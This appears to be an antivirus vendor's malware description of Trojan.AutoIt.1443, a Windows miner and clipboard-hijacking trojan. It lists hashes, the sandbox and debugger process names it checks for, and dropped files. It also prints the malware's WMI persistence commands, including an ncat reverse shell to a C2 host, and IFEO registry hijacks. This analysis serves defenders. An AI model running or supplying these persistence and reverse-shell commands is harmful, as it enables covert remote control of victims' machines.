Trojan.AutoIt.1443

• 09cffca796dce03c74950e10a349079d9afe3964
• 419ef7dc18d178247daf68f0571a3dccb662792f
• 9c17f83aba6b60c8d461a923050fc9a19e386ec1
• e7ac807a446640a95a961fb5d873c051ee8c2793

Description

Malicious Autoit script for OS Windows that drops a number of files to a compromised PC to implement hidden cryptocurrency mining and spoof data in the clipboard.

Operating routine

The script is launched by a dropper, which is a self-extracting archive. Once launched, Trojan.AutoIt.1443 will perform the following actions:

1. Check the process list for the following lines from the list below:

dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

If any of these processes are found, the script will terminate.

2. Create directories

Set the SYSTEM, HIDDEN and READONLY attributes for the following directories: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} and C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.

3. Unpack files

These files are not malicious. They are required to implement network communication through the StartMenuExperienceHost.exe executable, which is a renamed ncat.exe. This file connects to the attacker's C2 server. It is detected as Tool.Ncat.1.

The ShellExt.dll file, which is unpacked to all directories created above, is a renamed AutoIt language interpreter. Here it runs a malicious script embedded in the overlay of the DeviceId.dll file, which has a valid digital signature. The script unpacks and launches the SilentCryptoMiner miner (detected as Trojan.BtcMine.3767), which is injected in the explorer.exe process using the Process Hollowing technique.

Similarly, in this directory, the AutoIt interpreter (ShellExt.dll) initiated by nun.bat runs a malicious script embedded in the DeviceId.dll file overlay to mine cryptocurrency.

This set of files is designed to run a clipper hidden in the 7zxa.dll library, which is also injected in explorer.exe using the Process Hollowing technique. The clipper spoofs cryptocurrency wallet addresses in the clipboard.

C:\ProgramData\inst.bat

This script performs the same functions as described below in item 4.1.

4. Create events and modify the registry

4.1 Add events that ensure connection to the C2 server using StartMenuExperienceHost.exe (ncat.exe)

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Add registry keys to run malicious files using the IFEO technique

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f

5. Configuration

5.1 Change directory permissions by running the following commands

This revokes the following permissions:

• Delete
• Change discretionary access control list
• Write permissions for the owner
• Change access control security settings
• Create new subfolders and append data
• Write attributes, including extended attributes
• Delete subfolders and files
• Create files and write data

5.2 Disable System Restore by modifying the registry subkeys:

Then, the following command is executed:

5.3 Run the C:\ProgramData\inst.bat file

6. Obtain information about the compromised computer

Send a GET request to ip-api[.]com/json to obtain geolocation information. Information about the GPU model and installed antivirus software is collected using the winmgmt.exe utility, the CPU model is retrieved from the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 registry subkey, and information about the operating system is read from the @OSVersion and @OSArch variables in Autoit.

The received information is sent to the Telegram bot.

Mitre Matrix